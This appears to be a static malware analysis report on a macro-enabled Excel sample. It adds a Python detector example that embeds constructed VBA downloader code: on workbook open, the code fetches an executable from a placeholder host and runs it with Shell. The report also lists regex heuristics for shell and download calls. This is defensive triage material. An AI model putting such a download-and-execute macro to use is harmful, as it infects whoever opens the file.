Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 498e6993300b382e…

MALICIOUS

Office (OOXML) / .XLSM

Size: 26.1 KB
Created: 2022-05-31 09:01:43 UTC
Authoring application: 16.0300
First seen: 2022-05-31

MD5: 40e0b62dcb0c547f4b75ad732dfcc8b5
SHA-1: 40ac627a8a24fb615119336a45546e6515df2bab
SHA-256: 498e6993300b382e4140d7782a7e8560e996b6c46e5bcc6cb240c74db8e69d7b

Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 User Execution: Malicious File

The sample is an XLSM file containing VBA macros. The macro declares and calls the urlmon API URLDownloadToFileA to fetch a file from a hardcoded URL to disk and then launches it. It also invokes Shell on 'calc' and 'notepad', most likely test residue or noise intended to obscure the real payload. The document body contains obfuscated text, which is typical of a lure. Because the URL is hardcoded, the download location can be recovered directly from the extracted macro source without executing the document.

Heuristics (4)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OLE_VBA_DOWNLOAD (critical): URLDownloadToFile in VBA
  • OLE_VBA_CREATEOBJ (high): CreateObject call
  • OOXML_VBA (medium): VBA project inside OOXML; the package contains vbaProject.bin, so VBA macros are present
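The following is an added example and not code from the sample or from the analysis platform that produced this report. It reproduces the two layers of checks the report relies on: the OOXML_VBA container check (is a vbaProject.bin part present in the OOXML zip, and does [Content_Types].xml declare a macro-enabled workbook) and the three source heuristics OLE_VBA_SHELL, OLE_VBA_DOWNLOAD and OLE_VBA_CREATEOBJ run over decoded VBA text of the kind olevba emits as macros.bas. The OOXML package, the VBA source and the URL (on the reserved example.invalid domain) are constructed for the example and mirror the behaviour described above; the heuristic regexes are my own, not the platform's.

```python
"""Added example: OOXML_VBA container check plus VBA source heuristics on
constructed input. Not the sample's code and not the analysis platform's
own detection logic."""
import io
import re
import zipfile

# Constructed decoded VBA source shaped like the report's description
# (URLDownloadToFileA download, Shell of the dropped file, calc/notepad).
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Workbook_Open()
    Dim fso As Object, target As String
    Set fso = CreateObject("Scripting.FileSystemObject")
    target = Environ("TEMP") & "\upd.exe"
    URLDownloadToFileA 0, "http://dl.example.invalid/stage2.exe", target, 0, 0
    Shell target, vbHide
    Shell "calc"
    Shell "notepad"
End Sub
'''

# Heuristic ID -> (severity as in the report, pattern). Word boundaries keep
# names such as ShellExecute or URLDownloadToCacheFile from matching.
HEURISTICS = {
    "OLE_VBA_SHELL": ("critical", re.compile(r"\bShell\b", re.I)),
    "OLE_VBA_DOWNLOAD": ("critical", re.compile(r"\bURLDownloadToFile[AW]?\b", re.I)),
    "OLE_VBA_CREATEOBJ": ("high", re.compile(r"\bCreateObject\b", re.I)),
}
URL_RX = re.compile(r"""https?://[^\s"'()<>]+""", re.I)

MACRO_CT = "application/vnd.ms-excel.sheet.macroEnabled.main+xml"
PLAIN_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"
VBA_CT = "application/vnd.ms-office.vbaProject"


def build_sample_xlsm(with_vba: bool) -> bytes:
    """Build a minimal constructed OOXML zip (not a real workbook) so the
    container check has something to run on offline."""
    overrides = f'<Override PartName="/xl/workbook.xml" ContentType="{MACRO_CT if with_vba else PLAIN_CT}"/>'
    if with_vba:
        overrides += f'<Override PartName="/xl/vbaProject.bin" ContentType="{VBA_CT}"/>'
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f"{overrides}</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.xml", "<workbook/>")
        if with_vba:
            # OLE compound-file magic followed by padding; a real vbaProject.bin
            # is a full OLE container holding the compressed module streams.
            z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8)
    return buf.getvalue()


def check_ooxml_vba(data: bytes) -> dict:
    """OOXML_VBA heuristic: flag any vbaProject.bin part. The canonical path is
    xl/vbaProject.bin, but a full parser resolves it via the workbook's .rels,
    so match on the part name suffix rather than the exact path."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        ct_xml = z.read("[Content_Types].xml").decode("utf-8", "replace")
    vba_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
    return {
        "vba_parts": vba_parts,
        "macro_enabled_ct": MACRO_CT in ct_xml,
        "vba_ct": VBA_CT in ct_xml,
        "OOXML_VBA": bool(vba_parts),
    }


def scan_vba_source(src: str) -> dict:
    """Run the source heuristics over decoded VBA text and pull hardcoded URLs
    (the IOC a static triage most wants from a downloader macro)."""
    hits = {}
    for hid, (severity, rx) in HEURISTICS.items():
        count = len(rx.findall(src))
        if count:
            hits[hid] = {"severity": severity, "count": count}
    return {"hits": hits, "urls": sorted(set(URL_RX.findall(src)))}


if __name__ == "__main__":
    print(check_ooxml_vba(build_sample_xlsm(True)))
    print(scan_vba_source(SAMPLE_VBA))
```

Against the constructed input the container check reports the vbaProject.bin part and the macro-enabled content type, and the source scan fires all three heuristics (three Shell calls, two URLDownloadToFileA references counting the Declare line, one CreateObject) and returns the single hardcoded URL. On a real sample the decoded source comes from olevba, since the module streams inside vbaProject.bin are MS-OVBA compressed and not greppable in the raw container.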

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: ebaa97748f7d40bc44f150e799c5e975ff2917ebe958ccd48f2aa155dcdcebd4
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1993 bytes

Filename: vbaProject_00.bin
SHA-256: 279ec93c98754c859d0313e1aa8d2d59a8d411818dbb4dfc504d296350c9f2d5
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 17408 bytes